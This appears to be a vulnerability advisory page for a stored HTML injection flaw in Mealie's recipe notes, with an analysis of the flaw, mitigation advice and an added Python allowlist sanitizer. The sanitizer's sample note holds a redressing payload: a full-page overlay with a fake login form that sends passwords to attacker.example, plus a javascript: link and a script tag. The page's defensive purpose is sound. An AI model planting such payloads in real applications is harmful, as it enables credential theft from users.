CVE-2025-70296 in Mealie
Summary
by MITRE • 02/11/2026
A stored HTML injection vulnerability in the Recipe Notes rendering component in Mealie 3.3.1 allows remote authenticated users to inject arbitrary HTML, resulting in user interface redressing within the recipe view.
Analysis
by VulDB Data Team • 02/23/2026
CVE-2025-70296 is a stored HTML injection flaw in the Recipe Notes rendering component of Mealie version 3.3.1, an open-source meal planning and recipe management application. The affected code path is the one that displays user-generated recipe notes in the recipe view, so any authenticated user who can edit a recipe's notes can change what every other user sees when they open that recipe.
The root cause is missing output encoding (or allowlist sanitization) in the recipe notes rendering path. When an authenticated user saves a note containing HTML markup, the application stores the markup as submitted and the recipe view later renders it as HTML rather than as text. Because the payload lives in the database, it is delivered to each user who opens the recipe, and the injected markup is interpreted by the victim's browser inside the authenticated Mealie origin. This is a client-side injection: the server does not execute attacker code, it faithfully serves attacker-controlled markup to other users.
Operationally, the injected markup enables user interface redressing: the attacker's HTML can overlay or replace legitimate elements of the recipe view, for example a fake "session expired" login form positioned over the real content, or links and buttons styled to look like Mealie's own. That is enough for credential phishing inside the application's trusted context, and where the rendering path also allows script execution it extends to session theft. The MITRE description documents HTML injection and UI redressing rather than confirmed script execution, so whether JavaScript runs should be verified against the specific rendering code rather than assumed. The prerequisite is low: the attacker needs only an authenticated account able to edit recipe notes, and the victims are the other users who later view that recipe.
The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. Cross-Site Scripting), the category that covers HTML injection as well as script injection arising from insufficient output encoding. This is the stored variant: the payload is persisted and re-delivered on every view without the attacker having to lure the victim to a crafted link, which makes it more dangerous than reflected variants. The ATT&CK mapping lists T1059.007 (Command and Scripting Interpreter: JavaScript) and T1566.001 (Phishing: Spearphishing Attachment), reflecting the use of the injected content to run script in the browser or to present a lure that appears legitimate within the application.
Mitigation starts at the rendering step: recipe notes should be output-encoded as text, or, if rich formatting is a product requirement, passed through an allowlist HTML sanitizer (for example DOMPurify in the browser, or an equivalent server-side sanitizer) that keeps a small set of formatting tags and strips everything else, including style attributes, form elements, iframes and event-handler attributes. A Content Security Policy that disallows inline script adds a second layer against script execution, but it does not stop purely markup-based redressing, so it complements sanitization rather than replacing it. Operators should update to a version of Mealie that addresses the issue as soon as one is available; in the meantime they can limit which accounts may edit recipes and review stored notes for markup such as script, form, iframe or positioned div elements, the patterns an exploitation attempt leaves in the database. A web application firewall can flag such content on submission, but encoding variations bypass it easily, so it should not be the only control.
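As an added illustration of the rendering-side fix described above, and of the review-stored-notes monitoring point, the block below is an allowlist sanitizer for recipe-note HTML written for this page. It is not Mealie's code: the tag and attribute allowlist, the function names and the sample note are assumptions made for the example. Text is always re-escaped, only a handful of formatting tags survive, href values are restricted to safe schemes, script and style bodies are removed entirely, and everything stripped is returned so a caller can log or alert on notes that carried injected markup.

```python
"""Allowlist sanitizer for recipe-note HTML (added example, not Mealie code).

Shows the fix direction for CVE-2025-70296: stored notes are rendered only
through an allowlist, never as raw HTML. The allowlist, function names and
sample note below are assumptions made for this example.
"""
from html import escape
from html.parser import HTMLParser

# Formatting a notes field plausibly needs; anything else is stripped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "ul", "ol", "li", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style/class/on* anywhere
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}  # remove the element and its body
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:")


class _NoteSanitizer(HTMLParser):
    """Re-emits allowlisted markup, escapes all text, records what it dropped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropped: list[str] = []   # non-empty => note carried injected markup
        self._open: list[str] = []     # allowlisted tags currently open
        self._skip = 0                 # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)   # <div>, <form>, <input>, <iframe>, ...
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                self.dropped.append(f"{tag}@{name}")
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                self.dropped.append(f"{tag}@{name}")   # javascript:, data:, ...
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if self._skip:
                self._skip -= 1
            return
        if tag in self._open:
            # Close anything left open inside it so the output stays well-formed.
            while self._open:
                inner = self._open.pop()
                self.out.append(f"</{inner}>")
                if inner == tag:
                    break

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))  # text is always text

    def close(self):
        super().close()
        while self._open:                 # unterminated tags at end of input
            self.out.append(f"</{self._open.pop()}>")


def sanitize_note(raw: str) -> tuple[str, list[str]]:
    """Return (safe_html, dropped). Render safe_html; alert on a non-empty dropped."""
    p = _NoteSanitizer()
    p.feed(raw)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample: legitimate formatting plus a redressing payload that
# covers the page with a fake login form, a javascript: link and a script.
SAMPLE_NOTE = (
    '<p>Rest the dough <b>overnight</b>.</p>'
    '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff">'
    '<form action="https://attacker.example/collect">'
    'Session expired. <input name="password" type="password"> <button>Log in</button>'
    '</form></div>'
    '<a href="javascript:alert(1)">tip</a>'
    '<a href="https://example.org/sourdough">source</a>'
    '<script>document.title="x"</script>'
)

if __name__ == "__main__":
    safe, dropped = sanitize_note(SAMPLE_NOTE)
    print(safe)
    print("dropped:", dropped)
```

Run on the constructed note, the overlay div, form, input, button and script are removed with the form's prompt left as inert text, the javascript: link survives only as plain anchor text, the https link and the bold formatting are kept, and the dropped list names each removed element. That list is the cheap detection signal: a sanitizer applied at save time or in a one-off scan of existing notes flags every record where it is non-empty, which is exactly the set of notes an attacker has already tampered with.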